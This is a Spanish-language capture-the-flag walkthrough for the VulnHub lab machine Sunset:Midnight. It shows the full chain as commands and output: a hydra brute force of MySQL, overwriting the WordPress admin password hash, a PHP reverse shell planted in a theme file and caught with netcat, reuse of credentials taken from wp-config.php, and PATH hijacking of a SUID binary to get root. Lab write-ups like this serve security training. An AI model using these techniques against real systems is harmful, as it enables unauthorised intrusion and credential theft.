[VULNHUB] Sunset:Midnight

Hoy vamos a hackear la maquina de Vulnhub llamada Sunset:Midnight.Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/sunset-midnight,517/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.112 ✘ INT 9s Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-18 10:50 CEST Nmap scan report for midnight.home (192.168.1.112) Host is up (0.00040s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA) | 256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA) |_ 256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) | http-robots.txt: 1 disallowed entry |_/wp-admin/ |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Did not follow redirect to http://sunset-midnight/ 3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1 | mysql-info: | Protocol: 10 | Version: 5.5.5-10.3.22-MariaDB-0+deb10u1 | Thread ID: 15 | Capabilities flags: 63486 | Some Capabilities: InteractiveClient, LongColumnFlag, Support41Auth, ConnectWithDatabase, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, IgnoreSigpipes, SupportsTransactions, Speaks41ProtocolNew, ODBCClient, FoundRows, DontAllowDatabaseTableColumn, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins | Status: Autocommit | Salt: WpR'kgE^-c+Jq{9H@DvG |_ Auth Plugin Name: 104 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.19 seconds
    Vemos que tiene el puerto 3306 (mysql) abierto y que podemos interactuar con el, asi que hacemos bruteforce al usuario root en el mysql usando hydra.
    ~ > hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.112 mysql Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-18 10:51:34 [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections) [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task [DATA] attacking mysql://192.168.1.112:3306/ [3306][mysql] host: 192.168.1.112 login: root password: robert 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-18 10:51:43
    Encontramos la password! Nos logueamos en el mysql con los credenciales que hemos conseguido.
    ~ > mysql mysql -h 192.168.1.112 -u root -p Enter password: Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 206 Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [mysql]>
    Miramos que BBDD hay.
    MariaDB [mysql]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | wordpress_db | +--------------------+ 4 rows in set (0.001 sec) MariaDB [mysql]>
    Seleccionamos la BBDD "wordpress_db" y miramos las tablas...
    MariaDB [mysql]> use wordpress_db Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MariaDB [wordpress_db]> show tables; +------------------------+ | Tables_in_wordpress_db | +------------------------+ | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_sp_polls | | wp_term_relationships | | wp_term_taxonomy | | wp_termmeta | | wp_terms | | wp_usermeta | | wp_users | +------------------------+ 13 rows in set (0.001 sec) MariaDB [wordpress_db]>
    Miramos la tabla "wp_users".
    MariaDB [wordpress_db]> select * from wp_users; +----+------------+------------------------------------+---------------+-------- -------------+------------------------+---------------------+------------------- --+-------------+--------------+ | ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | +----+------------+------------------------------------+---------------+-------- -------------+------------------------+---------------------+------------------- --+-------------+--------------+ | 1 | admin | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ | admin | example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 | | 0 | admin | +----+------------+------------------------------------+---------------+-------- -------------+------------------------+---------------------+------------------- --+-------------+--------------+ 1 row in set (0.000 sec) MariaDB [wordpress_db]>
    Al ser "root", podemos modificar los datos de la tabla. Vamos a modificar la password para poder loguearnos en el wordpress como admin. Para ello generamos una pass:
    ~ > echo -n "pass123" | md5sum 32250170a0dca92d53ec9624f336ca24 -
    Hacemos el update (la password es pass123)
    MariaDB [wordpress_db]> update wp_users SET user_pass="32250170a0dca92d53ec9624f336ca24" where user_login="admin" -> ; Query OK, 1 row affected (0.010 sec) Rows matched: 1 Changed: 1 Warnings: 0
    Agregamos al /etc/hosts: 192.168.1.112 sunset-midnight Y visitamos: http://sunset-midnight/wp-login.php Ya estamos logueados en el wordpress como admin :) Vamos a agregar una reverse shell, para ello editamos /usr/share/webshells/php/php-reverse-shell.php y ponemos nuestra IP. Una vez modificada, en wordpress vamos a: Aparencia -> Theme Editor y modificamos el header.php, agregando nuestra reverse shell php. Una vez modificado, ponemos nc a la escucha:
    ~ > nc -nlvp 1234 listening on [any] 1234 ...
    Visitamos http://sunset-midnight/ y obtenemos nuestra shell :)
  • Low Shell
  • ~ > nc -nlvp 1234 listening on [any] 1234 ... connect to [192.168.1.59] from (UNKNOWN) [192.168.1.112] 54120 Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux 06:01:19 up 1:11, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python3 -c 'import pty;pty.spawn("/bin/bash")'
    Una vez dentro, exploramos el sistema. Al tener un wordpress instalado, miramos el fichero wp-config.php.
    www-data@midnight:/$ cd /var/www/html/wordpress www-data@midnight:/var/www/html/wordpress$ ls ls index.php wp-blog-header.php wp-includes wp-settings.php license.txt wp-comments-post.php wp-links-opml.php wp-signup.php readme.html wp-config.php wp-load.php wp-trackback.php wp-activate.php wp-content wp-login.php xmlrpc.php wp-admin wp-cron.php wp-mail.php www-data@midnight:/var/www/html/wordpress$ cat wp-config.php --SNIP-- define( 'DB_NAME', 'wordpress_db' ); define( 'DB_USER', 'jose' ); define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' ); define( 'DB_HOST', 'localhost' ); --SNIP--
    Vemos que en wp-config.php aparece el usuario "jose" y su respectiva password. Sabemos que hay un usuario llamado jose en el sistema asi que probar a loguearnos con sus credenciales.
    www-data@midnight:/home$ su jose Password: 645dc5a8871d2a4269d4cbe23f6ae103 jose@midnight:/home$ id uid=1000(jose) gid=1000(jose) groups=1000(jose),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1 09(netdev),111(bluetooth)
  • user.txt
  • Ya como jose, miramos la flag de user.txt.
    jose@midnight:/home$ cd /home/jose jose@midnight:~$ ls user.txt jose@midnight:~$ cat user.txt 956a9564aa5632edca7b745c696f6575
    Seguimos mirando que encontramos por el sistema, en este caso continuamos mirando los ficheros SUID.
    jose@midnight:~$ find / -perm -4000 2>/dev/null --SNIP-- /usr/bin/su /usr/bin/sudo /usr/bin/status /usr/lib/openssh/ssh-keysign --SNIP--
    Vemos que hay un fichero "status" que no suele ser habitual, le echamos un vistazo con strings para ver si vemos algo interesante.
  • Privilege Escalation
  • jose@midnight:~$ strings /usr/bin/status --SNIP-- /lib64/ld-linux-x86-64.so.2 libc.so.6 setuid service ssh status --SNIP--
    Vemos que el binario, ejecuta "service ssh status" usando un path relativo y no absoluto, con lo cual podemos crear nuestro propio "service", cambiar el $PATH y ejecutar el binario para que se ejecute nuestro "service" con permisos de root. Nuestro "service" sera unicamente un fichero que contenga "/bin/bash" para que no de una shell de root. Lo preparamos!
    jose@midnight:~$ echo "/bin/bash" > service jose@midnight:~$ chmod +x service jose@midnight:~$ export PATH=.:$PATH jose@midnight:~$ /usr/bin/status root@midnight:~# id uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109( netdev),111(bluetooth),1000(jose)
    Ya tenemos la shell con privilegios!
  • root.txt
  • root@midnight:~# cd /root root@midnight:/root# ls root.txt status status.c root@midnight:/root# cat root.txt ___ ____ /' --;^/ ,-_\ \ | / / / --o\ o-\ \\ --(_)-- /-/-/|o|-|\-\\|\\ / | \ '` ` |-| `` ' |-| |-|O |-(\,__ ...|-|\--,\_.... ,;;;;;;;;;;;;;;;;;;;;;;;;,. ~,;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;, ______ --------- _____ ------ db2def9d4ddcb83902b884de39d426e6 Thanks for playing! - Felipe Winsnes (@whitecr0wz)
  • End
  • Y con esto ya seriamos root de la maquina.